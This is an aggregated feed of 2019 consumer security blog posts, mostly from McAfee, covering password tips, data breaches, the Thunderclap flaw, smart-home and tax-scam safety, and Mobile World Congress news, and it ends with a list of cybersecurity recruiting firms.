  • Read the fine print. If you decide to install an app with a free trial, make sure you understand what fees you will be charged if you keep the subscription.
  • Remember to cancel your subscription. If you find a reputable free app that you’ve researched and want to use for a trial period, remember to cancel the subscription before uninstalling the app off your device. Instructions on canceling, pausing, and changing a subscription can be found on Google Play’s Help page.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics appeared first on McAfee Blogs.

5 Tips For Creating Bulletproof Passwords

While biometric tools like facial ID and fingerprints have become more common when it comes to securing our data and devices, strong passwords still play an essential part in safeguarding our digital lives.

This can be frustrating at times, since many of us have more accounts and passwords than we can possibly remember. This can lead us to dangerous password practices, such as choosing short and familiar passwords, and repeating them across numerous accounts. But password safety doesn’t have to be so hard. Here are some essential tips for creating bulletproof passwords.

Remember, simple is not safe

Every year surveys find that the most popular passwords are as simple as  “1234567” and just “password.” This is great news for the cybercrooks, but really bad news for the safety of our personal and financial information.

When it comes to creating strong passwords, length and complexity matter because it makes them harder to guess, and harder to crack if the cybercriminal is using an algorithm to quickly process combinations. The alarming truth is that passwords that are just 7 characters long take less than a third of a second to crack using these “brute force attack” algorithms.

Tricks:

  • Make sure that your passwords are at least 12 characters long and include numbers, symbols, and upper and lowercase letters.
  • Try substituting numbers and symbols for letters, such as zero for “O”, or @ for “A”.
  • If you’re using internet-connected devices, like IP cameras and interactive speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

Keep it impersonal

Passwords that include bits of personal information, such as your name, address, or pet’s name, make them easier to guess. This is especially true when we share a lot of personal information online. But you can use personal preferences that aren’t well known to create strong passphrases.

Tricks:

  • Try making your password a phrase, with random numbers and characters. For instance, if you love crime novels you might pick the phrase: ILoveBooksOnCrime
    Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as: 1L0VEBook$oNcRIM3!
  • If you do need to use personal information when setting up security questions, choose answers that are not easy to find online.
  • Keep all your passwords and passphrases private.

Never reuse passwords

If you reuse passwords and someone guesses a password for one account, they can potentially use it to get into others. This practice has gotten even riskier over the last several years, due to the high number of corporate data breaches. With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts.

Tricks:

  • Use unique passwords for each one of your accounts, even if it’s for an account that doesn’t hold a lot of personal information. These too can be compromised, and if you use the same password for more sensitive accounts, they too are at risk.
  • If a website or monitoring service you use warns you that your details may have been exposed, change your password immediately.

Employ a password manager

If just the thought of creating and managing complex passwords has you overwhelmed, outsource the work to a password manager! These are software programs that can create random and complex passwords for each of your accounts, and store them securely. This means you don’t have to remember your passwords – you can simply rely on the password manager to enter them when needed.

Tricks:

  • Look for security software that includes a password manager
  • Make sure your password manager uses multi-factor authentication, meaning it uses multiple pieces of information to identify you, such as facial recognition, a fingerprint, and a password.

Boost your overall security

Now that you’ve made sure that your passwords are bulletproof, make sure you have comprehensive security software that can protect you from a wide variety of threats.

Tricks:

  • Keep you software up-to-date and consider using a web advisor that protects you from accidentally typing passwords into phishing sites.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post 5 Tips For Creating Bulletproof Passwords appeared first on McAfee Blogs.

809 Million Records Left Exposed: How Users Can Protect Their Data

It’s no secret that technological advancements and online threats are directly proportional to each other. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of advanced malware attacks and massive data leaks. Speaking of the latter — less than two months after the Collection #1 data breach exposed 773 million email addresses, it seems we have another massive data dump in our midst. Last week, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm, Verifications.io.

You may be wondering how Verifications.io had so much data left to be exposed. Most people have heard of email marketing, but very few realize that these companies often vet user email addresses to ensure their validity. Enter Verifications.io. This company serves as a way email marketing firms can outsource the extensive work involved with validating mass amounts of emails and avoid the risk of having their infrastructure blacklisted by spam filters. Verifications.io was entrusted with a lot of data provided by email marketing firms looking to streamline their processes, creating an information-heavy database.

This unusual data trove contains tons of sensitive information like names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, social media accounts, and characterizations of people’s credit scores. While the data doesn’t contain Social Security Numbers or credit card information, that amount of aggregated data makes it much easier for cybercriminals to run new social engineering scams or expand their target audience. According to security researcher Troy Hunt, owner of HaveIBeenPwned, 35% of the data exposed by Verifications.io is new to his database. With that said, it was the second largest data dump added in terms of email addresses to Hunt’s website, which allows users to check whether their data has been exposed or breached.

Upon discovery, the firm was made aware of the incident. And while proper security measures were taken, users can take various steps themselves to protect their information in the event of largescale data exposure. Check out the following tips:

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your individual accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords on a consistent basis to further protect your data.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 809 Million Records Left Exposed: How Users Can Protect Their Data appeared first on McAfee Blogs.

Don’t Let Thunderclap Flaws Strike Your Device

If you own a Mac or PC, odds are you’ve used your laptop’s Thunderbolt port to connect another device to your machine. Thunderbolt ports are convenient for charging other devices using your laptop or desktop’s battery power. However, a new flaw called Thunderclap allows attackers to steal sensitive information such as passwords, encryption keys, financial information, or run detrimental code on the system if a malicious device is plugged into a machine’s port while it’s running.

So, how can attackers exploit this flaw? Thunderbolt accessories are granted direct-memory access (DMA), which is a method of transferring data from a computer’s random-access memory (RAM) to another part of the computer without it needing to pass through the central processing unit (CPU). DMA can save processing time and is a more efficient way to move data from the computer’s memory to other devices. However, attackers with physical access to the computer can take advantage of DMA by running arbitrary code on the device plugged into the Thunderbolt port. This allows criminals to steal sensitive data from the computer. Mind you, Thunderclap vulnerabilities also provide cybercriminals with direct and unlimited access to the machine’s memory, allowing for greater malicious activity.

Thunderclap-based attacks can be carried out with either specially built malicious peripheral devices or common devices such as projectors or chargers that have been altered to automatically attack the host they are connected to. What’s more, they can compromise a vulnerable computer in just a matter of seconds. Researchers who discovered this vulnerability informed manufacturers and fixes have been deployed, but it’s always good to take extra precautions. So, here are some ways users can defend themselves against these flaws:

  • Disable the Thunderbolt interface on your computer. To remove Thunderbolt accessibility on a Mac, go to the Network Preference panel, click “OK” on the New Interface Detected dialog, and select “Thunderbolt Bridge” from the sidebar. Click the [-] button to delete the option as a networking interface and choose “Apply.” PCs often allow users to disable Thunderbolt in BIOS or UEFI firmware settings, which connect a computer’s firmware to its operating system.
  • Don’t leave your computer unattended. Because this flaw requires a cybercriminal to have physical access to your device, make sure you keep a close eye on your laptop or PC to ensure no one can plug anything into your machine without permission.
  • Don’t borrow chargers or use publicly available charging stations. Public chargers may have been maliciously altered without your knowledge, so always use your own computer accessories.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Don’t Let Thunderclap Flaws Strike Your Device appeared first on McAfee Blogs.

International Women’s Day 2019: How can we be better allies?

Every year on March 8, we celebrate International Women's Day to honor the social, economic, cultural and political achievements of women. But we also acknowledge that there is still a long way to go before we’ve truly reached gender parity. This day gives us the opportunity to reflect on how we can achieve that balance. So it’s particularly fitting that the theme of this year’s International Women’s Day is “Balance for Better”

The post International Women’s Day 2019: How can we be better allies? appeared first on WeLiveSecurity

How To Secure Your Smart Home

Do you live in a “smart” home? If you look around and see interactive speakers, IP cameras, and other internet-connected devices like thermostats and appliances, you are now one of the millions of people who live with so-called “smart” devices. They bring convenience and comfort into our lives, but they also bring greater risks, by giving cybercrooks new opportunities to access our information, and even launch attacks.

You may remember a couple of years ago when thousands of infected devices were used to take down the websites of internet giants like Twitter and Netflix by overwhelming them with traffic. The owners of those devices were regular consumers, who had no idea that their IP cameras and DVRs had been compromised. You may also have heard stories of people who were eavesdropped on via their baby monitors, digital assistants, and webcams when their private networks were breached.

Unfortunately, these are not rare cases. In recent months, the “Internet of Things” (IoT) has been used repeatedly to spy on businesses, launch attacks, or even deliver cryptojacking malware or ransomware.

Still, given the benefits we get from these devices, they are probably here to stay.  We just need to acknowledge that today’s “smart” devices can be a little “dumb” when it comes to security. Many lack built-in security protections, and consumers are still learning about the risks they can pose. This is particularly concerning since the market for smart devices is large and growing. There are currently 7 billion IoT devices being used worldwide, and that number is expected to grow to 22 billion by 2025.

Cybercrooks have already taken note of these opportunities since malware attacks on smart devices have escalated rapidly. In fact, McAfee reported that malware directed at IoT devices was up 73%in the third quarter of 2018 alone.

So, whether you have one IoT device, or many, it’s worth learning how to use them safely.

Follow these smart home safety tips:

  • Research before you buy—Although most IoT devices don’t have built-in protection, some are safer than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks many of these features, consider upgrading it.
  • Safeguard your devices—Before you connect a new IoT device to your home network — allowing it to potentially connect with other data-rich devices, like smartphones and computers— change the default username and password to something strong, and unique. Hackers often know the default settings and share them online.Then, turn off any manufacturer settings that do not benefit you, like remote access. This is a feature some manufacturers use to monitor their products, but it could also be used by cybercrooks to access your system. Finally, make sure that your device software is up-to-date by checking the manufacturer’s website. This ensures that you are protected from any known vulnerabilities.
  • Secure your network—Your router is the central hub that connects all of the devices in your home, so you need to make sure that it’s secure. If you haven’t already, change the default password and name of your router. Make sure your network name does not give away your address, so hackers can’t locate it. Then check that your router is using an encryption method, like WPA2, which will keep your communications secure. Consider setting up a “guest network” for your IoT devices. This is a second network on your router that allows you to keep your computers and smartphones separate from IoT devices. So, if a device is compromised, a hacker still cannot get to all the valuable information that is saved on your computers. Check your router’s manual for instructions on how to set up a guest network. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network.
  • Install comprehensive security software –Finally, use comprehensive security software that can safeguard all your devices and data from known vulnerabilities and emerging threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Secure Your Smart Home appeared first on McAfee Blogs.

How to Steer Clear of Tax Season Scams

*This blog contains research discovered by Elizabeth Farrell

It’s that time of year again – tax season! Whether you’ve already filed in the hopes of an early refund or have yet to start the process, one thing is for sure: cybercriminals will certainly use tax season as a means to get victims to give up their personal and financial information. This time of year is advantageous for malicious actors since the IRS and tax preparers are some of the few people who actually need your personal data. As a result, consumers are targeted with various scams impersonating trusted sources like the IRS or DIY tax software companies. Fortunately, every year the IRS outlines the most prevalent tax scams, such as voice phishing, email phishing, and fake tax software scams. Let’s explore the details of these threats.

So, how do cybercriminals use voice phishing to impersonate the IRS? Voice phishing, a form of criminal phone fraud, uses social engineering tactics to gain access to victims’ personal and financial information. For tax scams, criminals will make unsolicited calls posing as the IRS and leave voicemails requesting an immediate callback. The crooks will then demand that the victim pay a phony tax bill in the form of a wire transfer, prepaid debit card or gift card. In one case outlined by Forbes, victims received emails in their inbox that allegedly contained voicemails from the IRS. The emails didn’t actually contain any voicemails but instead directed victims to a suspicious SharePoint URL. Last year, a number of SharePoint phishing scams occurred as an attempt to steal Office 365 credentials, so it’s not surprising that cybercriminals are using this technique to access taxpayers’ personal data now as well.

In addition to voice phishing schemes, malicious actors are also using email to try and get consumers to give up their personal and financial information. This year alone, almost 400 IRS phishing URLs have been reported. Even back in December, we saw a surge of new email phishing scams trying to fool consumers into thinking the message was coming from the IRS or other members of the tax community. In a typical email phishing scheme, scammers try to obtain personal tax information like usernames and passwords by using spoofed email addresses and stolen logos. In many cases, the emails contain suspicious hyperlinks that redirect users to a fake site or PDF attachments that may download malware or viruses. If a victim clicks on these malicious links or attachments, they can seriously endanger their tax data by giving identity thieves the opportunity to steal their refund. What’s more, cybercriminals are also using subject lines like “IRS Important Notice” and “IRS Taxpayer Notice” and demanding payment or threatening to seize the victim’s tax refund.

Cybercriminals are even going so far as to impersonate trusted brands like TurboTax for their scams. In this case, DIY tax preparers who search for TurboTax software on Google are shown ads for pirated versions of TurboTax. The victims will pay a fee for the software via PayPal, only to have their computer infected with malware after downloading the software. You may be wondering, how do victims happen upon this malicious software through a simple Google search? Unfortunately, scammers have been paying to have their spoofed sites show up in search results, increasing the chances that an innocent taxpayer will fall victim to their scheme.

Money is a prime motivator for many consumers, and malicious actors are fully prepared to exploit this. Many people are concerned about how much they might owe or are predicting how much they’ll get back on their tax refund, and scammers play to both of these emotions. So, as hundreds of taxpayers are waiting for a potential tax return, it’s important that they navigate tax season wisely. Check out the following tips to avoid being spoofed by cybercriminals and identity thieves:

  • File before cybercriminals do it for you. The easiest defense you can take against tax seasons schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.
  • Obtain a copy of your credit report. FYI – you’re entitled to a free copy of your credit report from each of the major bureaus once a year. So, make it a habit to request a copy of your file every three to four months, each time from a different credit bureau. That way, you can keep better track of and monitor any suspicious activity and act early if something appears fishy.
  • Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double check their legitimacy with a manager or the security department before you respond. Be wary of strange file attachment names such as “virus-for-you.doc.” Remember: the IRS only contacts people by snail mail, so if you get an email from someone claiming to be from the IRS, stay away.
  • Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
  • Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Steer Clear of Tax Season Scams appeared first on McAfee Blogs.

What MWC 2019 Shows Us About the Future of Connectivity

The time has come to say goodbye to Barcelona as we wrap up our time here at Mobile World Congress (MWC). Although it’s hard to believe that the show is already over, MWC 2019 managed to deliver a slew of showstoppers that captured our attention. Here are some of my main takeaways from the event:

Foldable Phones Are the Future

 MWC is an opportunity for telecommunications companies, chipmakers, and smartphone firms to show off their latest and greatest innovations, and they sure delivered this year. One particular device that had the show floor buzzing was the Huawei Mate X, a 5G-enabled smartphone that folds out to become an 8-inch tablet. Additionally, Samsung revealed its plans to hold a press event in early April for its foldable smartphone, the Galaxy Fold. Unlike Huawei’s Mate X, the Galaxy Fold bends so that it encloses like a book. Although neither of these devices are available at to the public yet, they’ve definitely made a bold statement when it comes to smartphone design.

Smart Home Technology Goes Mobile

 Google is one company taking advantage of smartphone enhancements by putting its Google Assistant into the Android texting app. Assistant for Android Messages allows slices of Google search results to be laid out for users based on their text messages. For example, if one user texted another asking to grab some lunch, a bubble would pop up authorizing Assistant to share suggestions for nearby restaurant locations. While Assistant for Android currently only works for movies and restaurants, we can imagine how this technology could expand to other facets of consumer lives. This addition also demonstrates how AI is slowly but surely making its way onto almost every high-end phone through its apps and other tools.

Enhancing the Gaming Experience with 5G, VR, and AR

Not to be shown up, gaming developers also made a statement by using 5G technology to bring gamers into a more immersed gaming environment. Mobile game developer Niantic, creator of Pokémon Go and the upcoming Harry Potter: Wizards Uniteapp, is already working on games that will require a 5G upgrade. One such prototype the company showcased, codenamed Neon, allows multiple people in the same place to play an augmented reality (AR) game at the same time. Each players’ phone shows them the game’s graphics superimposed on the real world and allows the players to shoot each other, duck and dodge, and pick up virtual items, all in real-time.

Niantic wasn’t the only one looking to expand the gaming experience with the help of 5G. At the Intel and Nokia booths, Sony set up an Oculus Rift VR game inspired by Marvel and Sony’s upcoming film Spider-Man: Far From Home. Thanks to the low latency and real-time responsiveness of 5G, one player in the Nokia booth was able to race the other player in the Intel booth as if they were swinging through spiderwebs in Manhattan. Players were able to experience how the next-generation of wireless technology will allow them to participate in a highly immersive gaming experience.

Bringing 4G and 5G to the Automotive Industry

Gaming isn’t the only industry that’s getting a facelift from 5G. At the show, Qualcomm announced two new additions to their automotive platform: the Qualcomm Snapdragon Automotive 4G and 5G Platforms. One of the main features of these platforms is vehicle-to-everything communication, or C-V2X, which allows a car to communicate with other vehicles on the road, roadside infrastructure, and more. In addition, the platforms offer a high-precision, multi-frequency global navigation satellite system, which will help enable self-driving implementations. The platforms also include features like multi-gigabit cloud connectivity, high bandwidth low latency teleoperations support, and precise positioning for lane-level navigation accuracy. These advancements in connectivity will potentially help future vehicles to improve safety, communications, and overall in-car experience for consumers.

Securing Consumers On-the-Go

The advancements in mobile connectivity have already made a huge impact on consumer lifestyles, especially given the widespread adoption of IoT devices and smart gadgets. But the rise in popularity of these devices has also caught the interest of malicious actors looking to access users’ networks. According to our latest Mobile Threat Report, cybercriminals look to trusted devices to gain access to other devices on the user’s home network. For example, McAfee researchers recently discovered a vulnerability within a Mr. Coffee brand coffee maker that could allow a malicious actor to access the user’s home network. In addition, they also uncovered a new vulnerability within BoxLock smart padlocks that could enable cybercriminals to unlock the devices within a matter of seconds.

And while consumers must take necessary security steps to combat vulnerabilities such as these, we at McAfee are also doing our part of help users everywhere remain secure. For instance, we’ve recently extended our partnerships with both Samsung and Türk Telekom in order to overcome some of these cybersecurity challenges. Together, we’re working to secure consumers from cyberthreats on Samsung Galaxy S10 smartphones and provide McAfee Safe Family protection for Türk Telekom’s fixed and mobile broadband customers.

While the likes of 5G, bendable smartphones, and VR took this year’s tradeshow by storm, it’s important for consumers to keep the cybersecurity implications of these advancements in mind. As the sun sets on our time here in Barcelona, we will keep working to safeguard every aspect of the consumer lifestyle so they can embrace improvements in mobile connectivity with confidence.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What MWC 2019 Shows Us About the Future of Connectivity appeared first on McAfee Blogs.

McAfee Partners With Telefónica To Help Secure Consumers Worldwide

These days, cyberattacks can feel relentless. Due to the interconnected nature of the world we live in, cybercriminals have managed to infiltrate our personal devices, our networks, and even our homes. That’s why we at McAfee believe it’s important now more than ever to secure every facet of the modern consumer lifestyle. And we’ve partnered with Telefónica to do just that.

This partnership first began back in February of last year, when ElevenPaths, Telefónica Cyber Security Unit, and McAfee announced we’re working together to reinforce the online security of Telefónica’s broadband and mobile customers across multiple markets. This partnership covers Europe and Latin America with plans to progressively roll out solutions in the different countries where Telefónica operates. It’s the first time a telecommunications company has delivered a security service to all of its customers, regardless of where they connect from. Fast forward to present day, and this partnership has only expanded. The global product developed by Telefónica and powered by McAfee was first launched in Spain as Movistar Conexión Segura, a service that protects home and mobile customers’ connectivity. Telefónica protects Fusión customers’ home connections with a smart router, thanks to the ElevenPaths solution powered by McAfee Secure Home Platform, which enables seamless security and easy activation. Conexión Segura is also available for Movistar mobile customers, including network protection and one license of Seguridad Dispositivo, a multi-device security protection. Only a few weeks after Spain, Movistar Argentina launched the solution for its fixed and mobile customers. These services help realize Telefónica’s “Security by Default” strategy, offering customers a more robust security solution that protects against threats like viruses, malware, phishing, and emerging IoT threats.

Telefónica and McAfee’s 360 partnership is dedicated to protecting the productivity of consumers everywhere. “This agreement gives customers current and contextual information on their cybersecurity status so they can stay connected with confidence,” said Pedro Pablo Pérez, Global Security VP of Telefónica and CEO of ElevenPaths, Telefónica Cybersecurity Unit.

ElevenPaths and Mcafee’s joint vision to create a more secure tomorrow brings us a step closer to stopping widespread cyberattacks. By joining forces to implement more robust security solutions around the world, we can ensure that our connectivity goes undisrupted. Because together is power.

To learn more about consumer security and our approach to it, be sure to follow us at @ElevenPaths and @McAfee.

The post McAfee Partners With Telefónica To Help Secure Consumers Worldwide appeared first on McAfee Blogs.

Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report

These days, we seem to have a newfound reliance on all things ‘smart.’ We give these devices the keys to our digital lives, entrusting them with tons of personal information. In fact, we are so eager to adopt this technology that we connect 4,800 devices per minute to the internet with no sign of slowing down.  This is largely because smart devices make our lives easier and enjoyable. But even though these devices are convenient, it’s important to understand they’re also convenient for cybercriminals, given they contain a treasure trove of personal data. To examine how exactly these hackers plan on capturing that data, we at McAfee have taken a deep dive into the mobile threat landscape in this year’s Mobile Threat Report. In this report, we examine some of the most significant threat trends, including new spyware, mobile malware, and IoT attack surfaces. Let’s take a look at these trends and how you can keep all your devices protected.

Operations RedDawn and FoulGoal

In our 2018 report, we predicted that attacks targeted toward mobile devices would increase, and everything from fake Fortnite apps to increased mobile malware has proven this to be true. However, two recent discoveries, Operation RedDawn and FoulGoal, prove just how targeted these attacks can really get. RedDawn, in particular, has set its sights on North Korean refugees, as the spyware attempts to copy photos, contacts, SMS messages, and other personal data belonging to the victim.

The latter attack, FoulGoal, actually occurred during last year’s World Cup, as the campaign used an app called Golden Cup to install spyware on victims’ devices. This app promised users live streams of games from the Russian 2018 FIFA World Cup, as well as a searchable database of previous World Cup records. In addition to stealing the user’s phone number, device details, and installed packages, FoulGoal also downloaded spyware to expand its infection into SMS messages, contacts, GPS details, and audio recordings.

A Virtual Backdoor

Our smartphones are now like remote controls for our smart homes, controlling everything from lights to locks to kitchen appliances. So, it was only a matter of time before cybercriminals looked for ways to trick users into leaving open a virtual backdoor. Enter TimpDoor, an Android-based malware family that does just that. First appearing in March 2018, it quickly became the leading mobile backdoor family, as it runs a SMiShing campaign that tricks users into downloading fake voice-messaging apps.

These virtual backdoors are now an ever-growing threat as hackers begin to take advantage of the always-connected nature of mobile phones and other connected devices. Once distributed as Trojanized apps through apps stores, like Google Play, these backdoors can come disguised as add-on games or customization tools. And while most are removed fairly quickly from app stores, hackers can still pivot their distribution efforts and leverage popular websites to conceive a socially engineered attack to trick users into enabling unknown sources.

The Voice Heard Around the Home

Around the world, there are already over 25 million voice assistants, or smart speakers, in use. From simple queries to controlling other IoT gadgets throughout the home, these devices play a big role in our living environments. But many of these IoT devices fail to pass even the most basic security practices, and have easily guessable passwords, notable buffer overflow issues, and unpatched vulnerabilities. This makes voice assistants an increasingly valuable and potentially profitable attack vector for cybercrime.

For a typical voice assistant in the home, the attack surface is quite broad. Cybercriminals could gain access to the microphone or listening stream, and then monitor everything said. Additionally, they could command the speakers to perform actions via other speaker devices, such as embedding commands in a TV program or internet video. Crooks could even alter customized actions to somehow aid their malicious schemes. However, some of the most pressing vulnerabilities can come from associated IoT devices, such as smart plugs, door locks, cameras, or connected appliances, which can have their own flaws and could provide unrestrained access to the rest of the home network.

The good news? We at McAfee are working tirelessly to evolve our home and mobile solutions to keep you protected from any current and future threats. Plus, there are quite a few steps you can personally take to secure your devices. Start by following these tips:

  • Delete apps at the first sign of suspicious activity. If an app requests access to anything outside of its service, or didn’t originate from a trusted source, remove it immediately from your device.
  • Protect your devices by protecting your home network. While we continue to embrace the idea of “smart homes” and connected devices, we also need to embrace the idea that with great connectivity, comes great responsibility to secure those connections. Consider built-in network security, which can automatically secure your connected devices at the router-level.
  • Keep your security software up-to-date. Whether it’s an antivirus solution or a comprehensive security suite, always keep your security solutions up-to-date. Software and firmware patches are ever-evolving and are made to combat newly discovered threats, so be sure to update every time you’re prompted to. Better yet, flip on automatic updates.
  • Change your device’s factory security settings. When it comes to products, many manufacturers don’t think “security first.” That means your device can be potentially vulnerable as soon as you open the box. By changing the factory settings you’re instantly upping your smart device’s security.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report appeared first on McAfee Blogs.

Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships

We’ve touched down in Barcelona for Mobile World Congress 2019 (MWC), which is looking to stretch the limits of mobile technology with new advancements made possible by the likes of IoT and 5G. This year, we are excited to announce the unveiling of our 2019 Mobile Threat Report, our extended partnership with Samsung to protect Galaxy S10 smartphones, and our strengthened partnership with Türk Telekom to provide a security solution to protect families online.

Mobile Connectivity and the Evolving Threat Landscape

These days, it’s a rare occurrence to enter a home that isn’t utilizing smart technology. Devices like smart TVs, voice assistants, and security cameras make our lives more convenient and connected. However, as consumers adopt this technology into their everyday lives, cybercriminals find new ways to exploit these devices for malicious activity. With an evolving threat landscape, cybercriminals are shifting their tactics in response to changes in the market. As we revealed in our latest Mobile Threat Report, malicious actors look for ways to maximize their profit, primarily through gaining control of trusted IoT devices like voice assistants. There are over 25 million voice assistants in use across the globe and many of these devices are connected to other things like thermostats, door locks, and smart plugs. With this increase in connectivity, cybercriminals have more opportunities to exploit users’ devices for malicious purposes. Additionally, cybercriminals are leveraging users’ reliance on their mobile phones to mine for cryptocurrency without the device owner’s knowledge. According to our Mobile Threat Report, cybersecurity researchers found more than 600 malicious cryptocurrency apps spread across 20 different app stores. In order to protect users during this time of rapid IoT and mobile growth, we here at McAfee are pushing to deliver solutions for relevant, real-world security challenges with the help of our partners.

Growing Partnerships to Protect What Matters

Some cybersecurity challenges we are working to overcome include threats like mobile malware and unsecured Wi-Fi. This year, we’ve extended our long-standing partnership with Samsung to help secure consumers from cyberthreats on Samsung Galaxy S10 smartphones. McAfee is also supporting Samsung Secure Wi-Fi service by providing backend infrastructure to protect consumers from risky Wi-Fi. In addition to mobile, this partnership also expands to help protect Samsung smart TVs, PCs, and laptops.

We’ve also strengthened our partnership with Türk Telekom, Turkey’s largest fixed broadband ISP. Last year, we announced this partnership to deliver cross-device security protection. This year, we’re providing a security solution to help parents protect their family’s digital lives. Powered by McAfee Safe Family, Türk Telekom’s fixed and mobile broadband customers will have the option to benefit from robust parental controls. These controls will allow parents to better manage their children’s online experience and give them greater peace of mind.

We’re excited to see what’s to come for the rest of MWC, and how these announcements will help improve consumers’ digital experiences. It is our hope that by continuing to extend our relationships with technology innovators, we can help champion built-in security across devices and networks.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships appeared first on McAfee Blogs.

Best Cybersecurity Search Firms & Recruiters 2019

As cybersecurity is becoming more and more popular each day it’s also important to mention that there is a shortage of skilled people within the industry. Many recruiters create specific cybersecurity departments so they can stay competitive and fill the gap. According to the Forbes, it is expected that cybersecurity market will hit $170 billion by 2020 and cybersecurity jobs are expected to reach 6 million by the end of 2019. It’s not a secret that the rapid growth rate of the industry requires a professional approach from some of the best infosec recruiters.

In a recent interview, Karla Jobling from BeecherMadden (a top UK cybersecurity recruiter) reveals that at first cybersecurity companies wanted to hire as many people as possible. However, now they are more concentrated on how to find not many, but just the right people for the right position. It is extremely important for a recruiter to match the candidate’s expectations with the requirement and the corporate culture of the client company.

List of best cybersecurity search firms for 2019

Shield Security Recruiters

Shield Security Recruiters
A leading global recruiting firm focuses in the Cyber Security industry in USA, Europe, APAC and LATAM.
Sheild Security Recruiters have the global expertise and knowledge to bring you the quality Cyber Security candidates you deserve, expect and need.

3P&T Security Recruiting3P&T Security Recruiting

3P&T has been sucessfull in recruiting people in various areas of cybersecurity. They are one of the best cybersecurity recruiters in the area of Seattle, USA. A great UK-based company which is extremly trusted among the infosec professionals in Europe They are always ready to provide expert advices to their clients.

Alta Associates

Adeptis Group

Alta Associates is based in New Jersey, USA and performs custom searches for the most senior level executive roles in the cyber industry. They also deal with risk management, privacy, compliance and governance.

AcuminAcumin Consulting

The company is based in London, but they operate internationally with a special focus on cybersecurity and risk management recruitment.They specialize in providing key infosec and law enforcement skills across all sectors.

Blackmere ConsultingBlackmere Consulting

This company is focusing on quality, speed and cost effectiveness to provide a more specialized approach to source the best talents in cybersecurity. Their services include direct hire, consulting or hiring on a contract for a specific project.

Caliber Security PartnersCaliber Security Partners

They specialty is recruiting and staff augmentation in the short or the long term. They establish trusting relationships with their clients to identify their true neeeds of talent. Another good addition to our cybersecurity search firms list.

Computer FuturesComputer Futures

The company provides a platform both for companies to look for potential talents and for people who are looking for a career in the cybersecurity industry as well. They have a dedicated team of cyber security and business risk that provides individiual solutions.

Cyber ExecCyber Exec

Cyber Exec is headquartered in the Houston, Texas, but operates internationally also in cities like Tokyo or London for example. They definitely know how to find the best C-level employeees.

CISORecruiterCISORecruiter

As the name suggests this company are a team of professionals that will take care of your needs and provide you with the right people for your cybersec company.

Cyber Security Recruiters

This company is among the best cybersecurity search firms in the state of Minnesota, USA and is in bussiness since 2009.

Cyber 360 Inc.

Another top cybersecurity recruiters that work together with some of the biggest cybersecurity leaders and their teams to hire skilled information security professionals.

InfoSec PeopleInfosec People

The company was launched in 2008 and is currently one of the leaders on the cybersecurity recruitment companies in the UK. You can easily find a role, find people or find an advice on their website.

KnownFourKnownFour

Another UK company with owners that has been into international recruiting services for more than 20 years. Their information security department works closely with the experts to provide the perfect solution to their clients.

Redbud Cyber Security

Redbud has a national reach in the USA and is looking to source all kind of positions from Analysts or Engineers to CISOs. They are well known within the industry and can provide some of the best cyber talents.

Security Recruiter

The firm serves clients globally in the fields of information security, corporate security, risk management, governance, compliance and business intelligence.

This was our latest list of cybersecurity search firms. We hope that you will find what you need. Feel free to contact us if you want to add a company to our list.

The post Best Cybersecurity Search Firms & Recruiters 2019 appeared first on CyberDB.